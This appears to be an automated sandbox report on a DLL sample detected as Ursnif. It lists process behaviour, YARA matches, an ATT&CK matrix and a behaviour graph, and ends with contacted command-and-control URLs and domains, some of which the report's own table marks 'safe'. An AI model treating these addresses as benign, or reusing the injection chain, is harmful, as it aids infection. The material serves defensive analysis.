            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D21BC cpuid
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B0799A CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D414A GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D5A5A CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D21BC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1Windows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
            Default AccountsNative API3Valid Accounts1Valid Accounts1Software Packing1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Access Token Manipulation1DLL Side-Loading1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Process Injection412Masquerading1NTDSSystem Information Discovery25Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptValid Accounts1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion31DCSyncVirtualization/Sandbox Evasion31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection412Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Regsvr321/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 555803 Sample: status.dll Startdate: 19/01/2022 Architecture: WINDOWS Score: 100 109 myip.opendns.com 2->109 111 222.222.67.208.in-addr.arpa 2->111 119 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->119 121 Multi AV Scanner detection for submitted file 2->121 123 Yara detected  Ursnif 2->123 125 5 other signatures 2->125 12 loaddll32.exe 2 2->12         started        15 iexplore.exe 2 84 2->15         started        signatures3 process4 signatures5 141 Writes to foreign memory regions 12->141 143 Writes or reads registry keys via WMI 12->143 145 Writes registry values via WMI 12->145 17 regsvr32.exe 1 12->17         started        21 rundll32.exe 1 1 12->21         started        23 cmd.exe 1 12->23         started        31 2 other processes 12->31 25 iexplore.exe 15->25         started        27 iexplore.exe 15->27         started        29 iexplore.exe 15->29         started        33 2 other processes 15->33 process6 dnsIp7 105 192.168.2.1 unknown unknown 17->105 113 Writes or reads registry keys via WMI 17->113 115 Writes registry values via WMI 17->115 35 mshta.exe 17->35         started        117 Writes to foreign memory regions 21->117 37 mshta.exe 21->37         started        39 control.exe 21->39         started        41 rundll32.exe 1 23->41         started        107 museumistat.bar 31.41.44.3, 49748, 49749, 49750 ASRELINKRU Russian Federation 25->107 44 powershell.exe 31->44         started        signatures8 process9 signatures10 46 powershell.exe 35->46         started        49 powershell.exe 37->49         started        51 rundll32.exe 39->51         started        127 Writes registry values via WMI 41->127 53 mshta.exe 41->53         started        129 Modifies the context of a thread in another process (thread injection) 44->129 131 Maps a DLL or memory area into another process 44->131 133 Creates a thread in another existing process (thread injection) 44->133 55 csc.exe 44->55         started        58 csc.exe 44->58         started        60 conhost.exe 44->60         started        process11 file12 62 csc.exe 46->62         started        65 conhost.exe 46->65         started        147 Modifies the context of a thread in another process (thread injection) 49->147 149 Maps a DLL or memory area into another process 49->149 151 Creates a thread in another existing process (thread injection) 49->151 67 csc.exe 49->67         started        69 csc.exe 49->69         started        71 conhost.exe 49->71         started        73 powershell.exe 53->73         started        95 C:\Users\user\AppData\Local\...\eutk2hxp.dll, PE32 55->95 dropped 76 cvtres.exe 55->76         started        97 C:\Users\user\AppData\Local\...\babtdr3v.dll, PE32 58->97 dropped signatures13 process14 file15 99 C:\Users\user\AppData\Local\...\yycrjy0w.dll, PE32 62->99 dropped 78 cvtres.exe 62->78         started        101 C:\Users\user\AppData\Local\...\5nzflxas.dll, PE32 67->101 dropped 80 cvtres.exe 67->80         started        103 C:\Users\user\AppData\Local\...\11mxocay.dll, PE32 69->103 dropped 135 Modifies the context of a thread in another process (thread injection) 73->135 137 Maps a DLL or memory area into another process 73->137 139 Creates a thread in another existing process (thread injection) 73->139 82 csc.exe 73->82         started        85 csc.exe 73->85         started        87 conhost.exe 73->87         started        signatures16 process17 file18 91 C:\Users\user\AppData\Local\...\fyriofhk.dll, PE32 82->91 dropped 89 cvtres.exe 82->89         started        93 C:\Users\user\AppData\Local\...\mrf10rqm.dll, PE32 85->93 dropped process19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            status.dll23%ReversingLabsWin32.Trojan.Ursnif
            status.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.rundll32.exe.4aa0000.1.unpack100%AviraHEUR/AGEN.1108158Download File
            1.2.loaddll32.exe.17d0000.1.unpack100%AviraHEUR/AGEN.1108158Download File
            4.2.regsvr32.exe.2d40000.1.unpack100%AviraHEUR/AGEN.1108158Download File
            6.2.rundll32.exe.ac0000.1.unpack100%AviraHEUR/AGEN.1108158Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s80%Avira URL Cloudsafe
            http://museumistat.bar/drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk0%Avira URL Cloudsafe
            http://museumistat.bar/drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk0%Avira URL Cloudsafe
            http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk0%Avira URL Cloudsafe
            http://constitution.org/usdeclar.txt0%URL Reputationsafe
            http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk0%Avira URL Cloudsafe
            http://museumistat.bar/drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk0%Avira URL Cloudsafe
            http://museumistat.bar/drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk0%Avira URL Cloudsafe
            http://museumistat.bar/drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk0%Avira URL Cloudsafe
            http://museumistat.bar/drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk0%Avira URL Cloudsafe
            http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7Hyzb0%Avira URL Cloudsafe
            http://museumistat.bar/drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk0%Avira URL Cloudsafe
            http://museumistat.bar/favicon.ico0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            museumistat.bar
            		31.41.44.3
            		truefalse
              		high
              myip.opendns.com
              		102.129.143.42
              		truefalse
                		high
                222.222.67.208.in-addr.arpa
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
